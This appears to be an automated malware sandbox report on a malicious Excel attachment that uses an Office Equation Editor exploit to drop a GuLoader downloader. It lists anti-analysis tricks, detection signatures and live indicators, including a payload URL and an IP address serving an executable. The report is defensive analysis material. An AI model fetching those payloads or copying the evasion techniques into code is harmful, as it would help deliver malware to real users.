Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2407	6_2_002F2407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F207C	6_2_002F207C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F40EF	6_2_002F40EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F04C0	6_2_002F04C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2567	6_2_002F2567
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6D5C	6_2_002F6D5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F21DB	6_2_002F21DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F05D8	6_2_002F05D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F0626	6_2_002F0626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8605	6_2_002F8605
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7EB4	6_2_002F7EB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EB2	6_2_002F3EB2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06E2	6_2_002F06E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06D2	6_2_002F06D2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F4345	6_2_002F4345
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B51	6_2_002F8B51
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FA8	6_2_002F3FA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F37A5	6_2_002F37A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FE9	6_2_002F3FE9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FC2	6_2_002F3FC2

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F2407 rdtsc

6_2_002F2407

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952

Thread sleep time: -180000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F2407 rdtsc

6_2_002F2407

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5022 mov eax, dword ptr fs:[00000030h]	6_2_002F5022
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F70BE mov eax, dword ptr fs:[00000030h]	6_2_002F70BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7 mov eax, dword ptr fs:[00000030h]	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F mov eax, dword ptr fs:[00000030h]	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3147 mov eax, dword ptr fs:[00000030h]	6_2_002F3147
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6B34 mov eax, dword ptr fs:[00000030h]	6_2_002F6B34

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F69D7 cpuid

6_2_002F69D7

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://kinmirai.org/wp-content/bin_lOulvHP91.bip	true	Avira URL Cloud: safe	unknown
http://180.214.239.39/service/.svchost.exe	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_lOulvHP91.bip"}

Multi AV Scanner detection for domain / URL

Source: http://180.214.239.39/service/.svchost.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Virustotal: Detection: 14%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 14%			Perma Link

Multi AV Scanner detection for submitted file

Source: new order requirment-21 July.xlsx	Virustotal: Detection: 30%			Perma Link
Source: new order requirment-21 July.xlsx	ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_lOulvHP91.bip

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE6E00F3.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: DE6E00F3.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FF NtAllocateVirtualMemory,	6_2_002F53FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5541 NtAllocateVirtualMemory,	6_2_002F5541
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FB NtAllocateVirtualMemory,	6_2_002F53FB

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FF	6_2_002F53FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2407	6_2_002F2407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F207C	6_2_002F207C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F444B	6_2_002F444B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5844	6_2_002F5844
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F38B4	6_2_002F38B4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8C81	6_2_002F8C81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F40EF	6_2_002F40EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F04C0	6_2_002F04C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F58D6	6_2_002F58D6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2567	6_2_002F2567
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6D5C	6_2_002F6D5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F51A4	6_2_002F51A4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F01E9	6_2_002F01E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F21DB	6_2_002F21DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F01DA	6_2_002F01DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F05D8	6_2_002F05D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7229	6_2_002F7229
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F0626	6_2_002F0626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1207	6_2_002F1207
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8605	6_2_002F8605
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F824D	6_2_002F824D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2A43	6_2_002F2A43
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7EB4	6_2_002F7EB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EB2	6_2_002F3EB2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7AEF	6_2_002F7AEF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06E2	6_2_002F06E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7AF5	6_2_002F7AF5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F26CA	6_2_002F26CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EC0	6_2_002F3EC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06D2	6_2_002F06D2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1B2E	6_2_002F1B2E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1B24	6_2_002F1B24
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1706	6_2_002F1706
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6F73	6_2_002F6F73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F4345	6_2_002F4345
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B5E	6_2_002F8B5E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B51	6_2_002F8B51
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FA8	6_2_002F3FA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F37A5	6_2_002F37A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FE9	6_2_002F3FE9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3BE2	6_2_002F3BE2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F47FF	6_2_002F47FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FB	6_2_002F53FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FC2	6_2_002F3FC2

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: new order requirment-21 July.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$new order requirment-21 July.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6DE.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: new order requirment-21 July.xlsx	Virustotal: Detection: 30%
Source: new order requirment-21 July.xlsx	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: new order requirment-21 July.xlsx

Static file information: File size 1242112 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Source: new order requirment-21 July.xlsx

Initial sample: OLE indicators vbamacros = False

Source: new order requirment-21 July.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2137818883.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002212F5 push edx; ret	6_2_00221321
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220878 push edx; ret	6_2_002208A1

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: new order requirment-21 July.xlsx

Stream path 'EncryptedPackage' entropy: 7.99879866952 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2407	6_2_002F2407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F207C	6_2_002F207C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F40EF	6_2_002F40EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F04C0	6_2_002F04C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2567	6_2_002F2567
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6D5C	6_2_002F6D5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F21DB	6_2_002F21DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F05D8	6_2_002F05D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F0626	6_2_002F0626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8605	6_2_002F8605
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7EB4	6_2_002F7EB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EB2	6_2_002F3EB2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06E2	6_2_002F06E2
